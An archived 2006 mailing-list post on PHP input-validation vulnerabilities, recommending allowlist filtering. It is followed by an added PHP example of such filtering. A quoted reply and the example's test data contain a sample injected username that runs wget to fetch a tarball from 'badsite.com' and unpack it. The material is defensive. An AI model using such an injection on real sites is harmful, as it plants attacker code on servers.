[CS-FSLUG] PHP vulnerabilities?
Yama Ploskonka
Yama at veritasacademy.net
Fri Jun 2 10:08:27 CDT 2006
When I first started using user-input scripts, one of the things I read
about was to filter ALL input to avoid anything bad coming in, in a
subroutine that deals with every input before it is handed on to the
rest of the script.
The suggestion was instead of filtering things _out_ (things like a
backslash), it is safer to filter things allowed in (letters, numbers,
underscore, space, hyphen, period, question mark, exclamation point).
This has been my favorite book for Perl. Originally I photocopied it
from the one copy in the University library in Uruguay; then, when
finally in the Land of Plenty, I was able to buy my own:
CGI Programming with Perl
Guelich, Gundavaram, Birznieks - O'Reilly
The _Security_ chapter is on pp. 194 onward. Interesting exposition also of
your responsibility and liability as a coder.
O'Reilly's website last year had it available for free download and/or reading.
Yama
Ed Hurst wrote:
> Tim Young wrote:
>> There are quite a number of ways to do this sort of thing. Most of the
>> time it is a poorly written PHP (or other language) script. The basic
>> thing is when you give someone the ability to input something. For
>> example, a username.
>>
>> Instead of having a username "Tim", they use something like:
>> "Tim; \"exec('wget http://badsite.com/badfile.tgz; tar -xzf
>> badfile.tgz')\""
>
> Excellent explanation! I may never, ever use PHP for anything, but I
> understood the concept. Checking input for a valid user name, and
> warning new users as they register, is thus a hallmark of having RTFM.
>
> Thanks. I'll be using this the next time I get questions from site admins.
>
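The allowlist approach Yama describes, as an added example in PHP (this is not code from the post, the book or the quoted replies; the filterAllowed and filterAllInput names, the per-field rule table and the sample inputs are my own assumptions, and the second sample is only the shape of the payload Tim quoted):

```php
<?php
// Added example, not from the original thread. Allowlist input filtering as
// described in the post: keep only characters explicitly permitted (letters,
// digits, underscore, space, hyphen, period, question mark, exclamation point)
// instead of trying to strip out known-bad ones.

/**
 * Return $value unchanged if every character is in the allowlist, else null.
 * $allowed is the body of a PCRE character class; the hyphen is kept last so
 * it is literal. \z (not $) is used so a trailing newline cannot slip past.
 */
function filterAllowed(string $value, string $allowed = 'A-Za-z0-9_ .?!-'): ?string
{
    // A length cap is part of the allowlist too: it bounds what the rest of
    // the script ever has to handle.
    if (strlen($value) > 64) {
        return null;
    }
    return preg_match('/^[' . $allowed . ']*\z/', $value) === 1 ? $value : null;
}

/**
 * The single subroutine every input passes through before the rest of the
 * script sees it. Fields not listed in $rules, non-string values and values
 * that fail their field's allowlist are dropped rather than passed along.
 */
function filterAllInput(array $raw, array $rules): array
{
    $clean = [];
    foreach ($rules as $field => $allowed) {
        if (!isset($raw[$field]) || !is_string($raw[$field])) {
            continue;
        }
        $value = filterAllowed($raw[$field], $allowed);
        if ($value !== null) {
            $clean[$field] = $value;
        }
    }
    return $clean;
}

// Per-field allowlists (assumed): usernames are tighter than free-text comments.
$rules = [
    'username' => 'A-Za-z0-9_-',
    'comment'  => 'A-Za-z0-9_ .?!-',
];

// Constructed sample input standing in for $_GET / $_POST. The second
// username has the shape of the injected string quoted in the thread.
$samples = [
    ['username' => 'Tim', 'comment' => 'Hello there!'],
    ['username' => 'Tim; "exec(\'wget http://badsite.com/badfile.tgz\')"', 'comment' => 'ok'],
    ['username' => 'Tim', 'comment' => '<script>alert(1)</script>'],
];

foreach ($samples as $raw) {
    $clean = filterAllInput($raw, $rules);
    echo 'username=' . ($clean['username'] ?? '(rejected)')
       . ' comment=' . ($clean['comment'] ?? '(rejected)') . "\n";
    // Even a validated value should never be interpolated into a shell string;
    // if a shell call is unavoidable, escapeshellarg() is the second layer.
    if (isset($clean['username'])) {
        echo '  shell-safe form: ' . escapeshellarg($clean['username']) . "\n";
    }
}
```

The first sample passes both fields, the second drops the username (semicolon, quotes and parentheses are not in its allowlist), and the third drops the comment (angle brackets are not permitted). The validation returns null rather than a "cleaned" string on purpose: silently deleting characters from an attacker's input can still leave a meaningful payload behind, whereas rejecting the field whole cannot.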